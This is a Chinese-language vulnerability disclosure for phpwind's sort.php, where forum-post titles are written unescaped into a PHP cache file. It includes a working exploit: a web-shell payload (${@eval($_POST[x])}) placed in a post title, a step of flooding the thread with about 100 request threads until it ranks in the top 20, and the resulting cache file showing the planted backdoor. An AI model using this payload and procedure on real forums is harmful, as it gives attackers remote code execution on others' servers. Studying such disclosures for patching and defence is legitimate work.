phpwind/sort.php 会定期每天处理一次帖子的浏览量、回复量、精华版排序
代码直接使用savearray将数据库查询出来的内容写入php文件,savearray出来的参数,都使用"双引号来包含,所以可以利用变量来执行任意命令
elseif($action=='article'){ $cachetime=@filemtime(D_P."data/bbscache/article_sort.php"); if(!$per || $timestamp-$cachetime>$per*3600){ $_SORTDB=$_sort=array(); $query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.replies DESC LIMIT $cachenum"); while($topic=$db->fetch_array($query)){ if($topic['replies']){ $topic['subject']=substrs($topic['subject'],25); $_sort[]=$topic; } } $_SORTDB['reply']=$_sort; $_sort=array(); $query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.hits DESC LIMIT $cachenum"); while($topic=$db->fetch_array($query)){ if($topic['hits']){ $topic['subject']=substrs($topic['subject'],25); $_sort[]=$topic; } } $_SORTDB['hit']=$_sort; $_sort=array(); $query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>'0' AND t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.lastpost DESC LIMIT $cachenum"); while($topic=$db->fetch_array($query)){ $topic['subject']=substrs($topic['subject'],25); $_sort[]=$topic; } $_SORTDB['digest']=$_sort; $ARTICLEDB=savearray('_ARTICLEDB',$_SORTDB); writeover(D_P.'data/bbscache/article_sort.php',"<?php\r\n".$ARTICLEDB.'?>'); }
发表一个帖子:标题如下
code 区域
${@eval($_POST[x])}XXXX
再开一个多线程(100线程,几分钟就可以了),请求访问那个帖子,直到帖子的访问量排入前20
function savearray($name,$array){ $arraydb="\$$name=array(\r\n\t\t"; foreach($array as $key=>$value){ $arraydb.="'".$key."'=>\narray(\r\n\t\t\t"; foreach($value as $value1){ $arraydb.='array('; foreach($value1 as $value2){ $arraydb.='"'.addslashes($value2).'",'; } $arraydb.="),\r\n\t\t\t"; } $arraydb.="),\r\n\t\t"; } $arraydb.=");\r\n"; return $arraydb;
二天,生成统计排行的时候,shell就躺在了 /data/bbscache/article_sort.php
三个白帽实际演示:http://**.**.**.**/data/bbscache/article_sort.php
漏洞证明:
/data/bbscache/article_sort.php
<?php $_ARTICLEDB=array( 'reply'=> array( array("1","${@eval($_POST[x])}XXXX ..","5732","2",), array("10","DDDDDDDDDDDDDDDDD","20","2",), array("7","HI Everybody ( b)ம","8","2",), array("3","hello","5","2",), array("5","䜲⊔","3","2",), array("2","test","3","2",), array("9","AAAAAAAAAAAAA","2","2",), array("6","ִА⫢,"1","2",), array("8","բ萾ዢ,"1","2",), ), 'hit'=> array( array("1","${@eval($_POST[x])}XXXX ..","11382","2",), array("2","test","3235","2",), array("3","hello","985","2",), array("5","䜲⊔","331","2",), array("7","HI Everybody ( b)ம","123","2",),